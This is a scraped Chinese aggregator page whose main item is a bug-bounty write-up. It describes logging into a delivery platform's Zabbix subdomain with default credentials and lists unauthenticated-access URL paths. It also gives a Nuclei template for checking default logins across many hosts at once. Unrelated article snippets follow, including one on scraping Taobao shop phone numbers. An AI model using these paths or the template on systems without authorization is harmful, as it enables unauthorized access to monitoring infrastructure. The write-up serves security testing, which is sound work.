当前位置: 首页 > news >正文

某配送平台未授权访问和弱口令(附赠nuclei默认密码验证脚本)

news 2025/6/10 11:30:18

找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下

使用谷歌搜索历史漏洞:zabbix漏洞


通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令


 


成功进去了,挖洞就是这么简单

搜索文章还报过未授权访问漏洞,打一波

 

  1. /overview.php?ddreset=1
  2. /srv_status.php?ddreset=1
  3. /latest.php?ddreset=1
  4. /zabbix.php?action=problem.view&ddreset=1
 

 

 

 

 


 又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入
 

 

 

 


 不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
 黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface
 

 

顺便写了一个nuclei批量默认密码验证脚本
 

【Nuclei-Poc】
 

 

  1. id: zabbix-default-credential-check
  3. info:
  4. name: Zabbix Default Credential Check
  5. author: 
  6. severity: high
  7. description: Check for default credentials in Zabbix.
  8. tags: zabbix,default,cred
  10. requests:
  11. - method: POST
  12. path:
  13. - "{{BaseURL}}/zabbix/index.php"
  15. body: |
  16. name=Admin&password=zabbix&autologin=1&enter=Sign+in
  18. headers:
  19. Content-Type: application/x-www-form-urlencoded
  20. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  21. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  22. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  23. Accept-Encoding: gzip, deflate
  24. Connection: close
  25. Upgrade-Insecure-Requests: 1
  26. Origin: "{{BaseURL}}"
  27. Referer: "{{BaseURL}}/zabbix/"
  29. matchers-condition: and
  30. matchers:
  31. - type: word
  32. words:
  33. - "Location: zabbix.php?action=dashboard.view"
  34. part: header
  36. - type: status
  37. status:
  38. - 302
 

【验证】
 

.\nuclei -l xx.txt -t xx.yaml
 

 

 

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。














相关文章:
















某配送平台未授权访问和弱口令(附赠nuclei默认密码验证脚本)




找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下 使用谷歌搜索历史漏洞:zabbix漏洞 通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令 成功进去了,挖洞就是这么简单 搜索文章还…...






编程日记
2024/7/1 22:21:56



















01.总览




目录 简介Course 1: Natural Language Processing with Classification and Vector SpaceWeek 1: Sentiment Analysis with Logistic RegressionWeek 2: Sentiment Analysis with Nave BayesWeek 3: Vector Space ModelsWeek 4: Machine Translation and Document Search Cours…...






编程日记
2024/7/1 22:20:54



















Linux换源




前言 
安装完Linux系统,尽量更换源以提高安装软件的速度。 
步骤 
备份原始源列表sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak修改sources.list sudo vim /etc/apt/sources.list将内容替换成对应的源  
**PS:清华源地址:https:…...






编程日记
2024/7/1 22:19:52



















【高考志愿】 化学工程与技术




目录 
一、专业概述 
二、就业前景 
三、就业方向 
四、报考注意 
五、专业发展与深造 
六、化学工程与技术专业排名 
七、总结 一、专业概述 化学工程与技术专业,这是一门深具挑战与机遇的综合性学科。它融合了工程技术的实用性和化学原理的严谨性,为毕…...






编程日记
2024/7/1 22:18:52



















2024上半年网络与数据安全法规政策、国标、报告合集




事关大局,我国数据安全立法体系已基本形成并逐步细化。数据基础制度建设事关国家发展和安全大局,数据安全治理贯穿构建数据基础制度体系全过程。随着我国数字经济建设进程加快,数据安全立法实现由点到面、由面到体加速构建,目前已…...






编程日记
2024/7/1 22:17:50



















基于SpringBoot扶农助农政策管理系统设计和实现(源码+LW+调试文档+讲解等)




💗博主介绍:✌全网粉丝10W,CSDN作者、博客专家、全栈领域优质创作者,博客之星、平台优质作者、专注于Java、小程序技术领域和毕业项目实战✌💗 🌟文末获取源码数据库🌟 感兴趣的可以先收藏起来,…...






编程日记
2024/7/1 22:16:49



















淘宝商铺电话怎么获取?使用爬虫工具采集




访问淘宝商铺是一个合法的行为,你可以使用爬虫工具来提取淘宝商铺的信息。下面是一个基本的Python程序示例,用于使用爬虫工具访问淘宝商铺: 
import requestsdef get_store_info(store_id):url  fhttps://shop{id}.taobao.comresponse  reque…...






编程日记
2024/7/1 22:14:47



















ModStart:开源免费的PHP企业网站开发建设管理系统




大家好!今天我要给大家介绍一款超级强大的开源工具——ModStart,它基于Laravel框架,是PHP企业网站开发建设的绝佳选择! 
为什么选择ModStart? 
模块化设计:ModStart采用模块化设计,内置了众多基…...






编程日记
2024/7/1 22:13:46



















npm安装依赖报错——npm ERR gyp verb cli的解决方法




1. 问题描述 
1.1 npm安装依赖报错——npm ERR! gyp verb cli npm MARN deprecated axiosQ0.18.1: critical security vuLnerability fixed in v0.21.1. For more information,
npm WARN deprecated svg001.3.2: This SVGO version is no Longer supported. upgrade to v2.x.x …...






编程日记
2024/7/1 22:12:45



















公网环境使用Potplayer远程访问家中群晖NAS搭建的WebDAV听歌看电影




文章目录 前言1 使用环境要求:2 配置webdav3 测试局域网使用potplayer访问webdav4 内网穿透,映射至公网5 使用固定地址在potplayer访问webdav 前言 
本文主要介绍如何在Windows设备使用potplayer播放器远程访问本地局域网的群晖NAS中的影视资源&#xff…...






编程日记
2024/7/1 22:09:42



















Forecasting from LiDAR via Future Object Detection




Forecasting from LiDAR via Future Object Detection 
基础信息 
论文:cvpr2022paper https://openaccess.thecvf.com/content/CVPR2022/papers/Peri_Forecasting_From_LiDAR_via_Future_Object_Detection_CVPR_2022_paper.pdfgithub:https://github.co…...






编程日记
2024/7/1 22:08:41



















【unity笔记】五、UI面板TextMeshPro 添加中文字体




Unity 中 TextMeshPro不支持中文字体,下面为解决方法: 准备字体文件,从Windows系统文件的Fonts文件夹里拖一个.ttf文件(C盘 > Windows > Fonts )  准备字库文件,新建一个文本文件,命名为“字库”&…...






编程日记
2024/7/1 22:03:30



















如何在Windows 11上设置默认麦克风和相机?这里有详细步骤




如果你的Windows 11计算机上连接了多个麦克风或网络摄像头,并且希望自动使用特定设备,而不必每次都在设置中乱动,则必须将首选设备设置为默认设备。我们将向你展示如何做到这一点。 
如何在Windows 11上更改默认麦克风 
有两种方法可以将麦克…...






编程日记
2024/7/1 22:02:29



















Flutter循序渐进==>数据结构(列表、映射和集合)和错误处理




导言 
填鸭似的教育确实不行,我高中时学过集合,不知道有什么用,毫无兴趣,等到我学了一门编程语言后,才发现集合真的很有用;可以去重,可以看你有我没有的,可以看我有你没有的&#xf…...






编程日记
2024/7/1 22:01:28



















泛微E9开发 限制明细表列的值重复




限制明细表列的值重复 1、需求说明2、实现方法3、扩展知识点3.1 修改单个字段值(不支持附件类型)3.1.1 格式3.1.2 参数3.1.3 案例 3.2 获取明细行所有行标示3.2.1 格式3.2.2 参数说明 1、需求说明 
限制明细表的“类型”字段,在同一个流程表单…...






编程日记
2024/7/1 21:54:20



















magicapi导出excel




参考:Hutool参考文档 response模块 | magic-api import response;import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;import cn.hutool.core.collection.CollUtil;
import cn.hutool.core.date.DateUtil;
…...






编程日记
2024/7/1 21:53:18



















【秋招突围】2024届秋招笔试-科大讯飞笔试题-03-三语言题解(Java/Cpp/Python)




🍭 大家好这里是清隆学长 ,一枚热爱算法的程序员 ✨ 本系计划跟新各公司春秋招的笔试题 💻 ACM银牌🥈| 多次AK大厂笔试 | 编程一对一辅导 👏 感谢大家的订阅➕ 和 喜欢💗 📧 清隆这边…...






编程日记
2024/7/1 21:52:16



















springboot是否可以代替spring




Spring Boot不能直接代替Spring,但它是Spring框架的一个扩展和增强,提供了更加便捷和高效的开发体验。以下是关于Spring Boot和Spring关系的详细解释: 
Spring框架: Spring是一个广泛应用的开源Java框架,提供了一系列模…...






编程日记
2024/7/1 21:51:14



















基于SpringBoot的CSGO赛事管理系统




您好!我是专注于计算机技术研究的码农小野。如果您对CSGO赛事管理系统感兴趣或有相关开发需求,欢迎随时联系我。 
开发语言:Java 
数据库:MySQL 
技术:SpringBoot框架,Java技术 
工具:Eclipse&a…...






编程日记
2024/7/1 21:50:12



















使用 Selenium 实现自动化分页处理与信息提取




目录 
项目背景与目标Selenium 环境配置分页处理的基本思路简化后的代码示例总结 
正文 
1. 项目背景与目标 
在进行 Web 自动化测试或数据抓取时,处理分页是一个常见的需求。通过 Selenium,我们可以自动化浏览多个分页并提取每页上的信息。本文将介绍如…...






编程日记
2024/7/1 21:49:11





















ABAP设计模式之---“Tell, Don’t Ask原则”




“Tell, Don’t Ask”是一种重要的面向对象编程设计原则,它强调的是对象之间如何有效地交流和协作。 1. 什么是 Tell, Don’t Ask 原则? 
这个原则的核心思想是: “告诉一个对象该做什么,而不是询问一个对象的状态再对它作出决策。…...






编程新知
2025/6/10 9:30:53



















【动态规划】B4336 [中山市赛 2023] 永别|普及+




B4336 [中山市赛 2023] 永别 
题目描述 
你做了一个梦,梦里有一个字符串,这个字符串无论正着读还是倒着读都是一样的,例如: a b c b a \tt abcba abcba 就符合这个条件。 
但是你醒来时不记得梦中的字符串是什么,只记得…...






编程新知
2025/6/10 6:57:00



















板凳-------Mysql cookbook学习 (十--2)




5.12 模式匹配中的大小写问题 
mysql> use cookbook
Database changed
mysql> select a like A, a regexp A;
------------------------------
| a like A | a regexp A |
------------------------------
|            1 |              1 |
--------------------------…...






编程新知
2025/6/10 4:31:28



















Qt Quick Dialogs模块功能及架构




Qt Quick Dialogs 是 Qt Quick 的一个附加模块,提供了一套用于创建和使用系统对话框的 QML 类型。在 Qt 6.0 中,这个模块经过了重构和增强。 
一、主要功能和特点 
1. 对话框类型 
Qt Quick Dialogs 在 Qt 6.0 中提供了以下标准对话框类型: 
…...






编程新知
2025/6/10 2:21:21



















Ubantu-Docker配置最新镜像源250605




尝试其他镜像加速器 
阿里云镜像加速器:登录阿里云,进入容器镜像服务获取专属加速器地址。毫秒镜像:https://docker.1ms.run。DockerHub镜像加速器:https://docker.xuanyuan.me。Docker Hub 镜像加速服务:https://dock…...






编程新知
2025/6/10 1:19:21



















Prompt工程学习之思维树(TOT)




思维树 
定义:思维树(Tree of Thoughts, ToT) 是一种先进的推理框架,它通过同时探索多条推理路径对思维链(Chain of Thought)** 进行了扩展。该技术将问题解决视为一个搜索过程 —— 模型生成不同的中间步骤…...






编程新知
2025/6/9 23:44:13



















2. Web网络基础 - 协议端口




深入解析协议端口与netstat命令:网络工程师的实战指南 在网络通信中,协议端口是服务访问的门户。本文将全面解析端口概念,并通过netstat命令实战演示如何监控网络连接状态。 一、协议端口核心知识解析 
1. 端口号的本质与分类 
端口范围类型说…...






编程新知
2025/6/9 22:20:48



















Redis——主从哨兵配置




目录 
基础概念 
‌一、核心原理‌ 
‌二、核心特性‌ 
‌三、技术意义与应用价值‌ 
‌四、典型应用场景‌ 
案例部署 
‌一、主从复制配置命令‌ 
‌二、哨兵模式部署命令‌ 
‌关键注意事项‌ 基础概念 
‌一、核心原理‌ ‌内存存储与高性能‌ Redis 所有数据存储于内存中&…...






编程新知
2025/6/9 20:04:22



















Postgresql字符串操作函数




目录 
一、基础字符串操作 
二、大小写转换 
三、空白处理 
四、子串提取 
五、搜索与定位 
六、字符串修改 
七、填充与格式化 
八、编码转换 
九、正则表达式(高级匹配) 
十、其他实用函数 
使用技巧: 以下是 PostgreSQL 中最全面的常用字符…...






编程新知
2025/6/9 19:24:26



















Boost ASIO 库深入学习(3)




Boost ASIO 库深入学习(3) 
UDP简单通信导论 
在继续深入前,我们不妨也来点碎碎念,因为UDP通信协议的模型与TCP是不同的,这种差异正是理解“无连接通信”的关键所在。我们下面要构建的,是一个经典的UDP通信…...






编程新知
2025/6/9 18:50:19